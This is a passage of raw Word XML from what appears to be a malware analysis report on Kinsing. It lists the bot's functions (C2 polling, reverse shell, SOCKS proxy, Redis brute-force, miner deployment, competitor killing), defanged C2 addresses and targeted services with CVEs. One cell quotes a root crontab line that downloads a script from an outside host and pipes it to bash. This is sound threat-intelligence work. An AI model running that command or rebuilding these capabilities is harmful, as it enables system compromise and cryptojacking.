          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">C2 &amp;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Function</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main.getActiveC2CUrl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Retrieves current active C2 URL from rotation list</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main.setActiveC2CUrl</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Sets the active C2 URL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main.getTask</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Polls C2 server for new tasks</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main.sendResult</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Reports task results back to C2</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main.resultSender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Background goroutine for result delivery</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main.addResult</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Queues task results for sending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main.updateTask</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Updates task status on C2</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main.request</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Generic HTTP request handler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main.makeClient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Creates HTTP client (go-resty)</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main.healthChecker</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Periodic health check reporting to C2</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main.checkHealth2</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Secondary health check mechanism</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main.backconnect</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Reverse shell/connection to C2</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main.socks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SOCKS5 proxy server</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main.startSocks</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Initializes SOCKS proxy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main.connectForSocks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Establishes SOCKS connection to C2</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main.sendSocks</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Sends data through SOCKS tunnel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation &amp; Scanning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Function</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main.masscan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Network scanning using 'firewire' (masscan wrapper)</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main.redisBrute</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Redis brute-force authentication attacks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main.taskScan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Scan task handler</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main.runTaskWithScan</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Executes scan-type tasks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main.taskWithScanWorker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Worker goroutine for scan tasks</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main.runTaskWithHttp</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HTTP-based exploitation tasks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main.taskWithHttpWorker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Worker goroutine for HTTP exploit tasks</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main.tcpTask</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Raw TCP task execution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main.findAlive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Host alive detection</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main.findIp</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IP address discovery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main.findUrl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URL discovery for targets</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main.getTargets</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Retrieves target lists from C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Miner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Function</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main.tryToRunMiner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Attempts to deploy and start the XMRig miner</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main.getMinerPid</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Retrieves the miner process PID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main.sendMinerPid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Reports miner PID to C2</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main.isMinerRunning</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Checks if miner is currently active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main.minerRunningCheck</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Periodic miner health monitoring</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main.minRun</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Miner execution wrapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Anti-Analysis &amp; Competition Killing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Function</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main.killer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Main process killer — eliminates competing malware</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main.goMkill</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Goroutine-based process killing loop</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main.killByExe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Kills processes matching executable paths</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main.killByFiles</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Kills processes with matching file descriptors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main.killF</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File-based kill function</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main.killNonRoot</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Kills non-root competing processes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main.killOld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Kills older versions of itself</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main.goProcStat</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Process monitoring via /proc scanning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main.goStat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System statistics reporting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 C2 Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String extraction revealed multiple C2 server addresses and operational URLs:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">C2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IP/URL</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Role</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Evidence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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">185.61.7[.]8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Primary C2</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Embedded in binary string table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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">67.205.161[.]58</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Secondary C2</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Embedded in binary string table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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">104.248.3[.]165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Tertiary C2</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Embedded in binary string table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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">47.65.90[.]240</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Quaternary C2</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Referenced in file path strings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ourier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">80.64.16[.]241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Cron C2 / Script Delivery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Root crontab: wget -q -O - http://80.64.16[.]241/mt.sh | bash</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Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">185.221.152[.]130:443</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Mining Pool Proxy</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kdevtmpfsi connection target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Reconnaissance URLs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://api.ipify[.]org</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — External IP discovery</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://ipv4.icanhazip[.]com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — External IP discovery (backup)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">http://ifconfig[.]co</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — External IP discovery (tertiary)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Encryption &amp; Authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Kinsing uses multiple cryptographic primitives for C2 security:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">AES-GCM for encrypted communication (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto/aes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">crypto/cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RSA public key verification (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">main.loadPublicKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">main.checkSign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RC4 stream cipher (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">main.RC4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) for payload obfuscation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MD5 hashing (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">main.hash_md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">main.hash_file_md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">) for integrity checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UUID-based bot identification (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">main.getOrCreateUuid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E5984"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 Exploitation &amp; Lateral Movement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">String analysis reveals Kinsing targets multiple services for initial access and lateral movement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3D7AB5"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Known Exploit Targets (from string analysis)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache ActiveMQ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Confirmed entry vector for this honeypot (CVE-2023-46604)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Redis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — main.redisBrute function for unauthenticated/weak-auth Redis exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Docker API exploitation strings present</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Log4j</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Log4Shell (CVE-2021-44228) exploitation strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Jenkins</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Jenkins RCE exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WebLogic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Oracle WebLogic exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Confluence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Atlassian Confluence exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Salt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — SaltStack exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Solr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Apache Solr exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PHPUnit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — PHPUnit RCE exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Hadoop</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Hadoop YARN exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
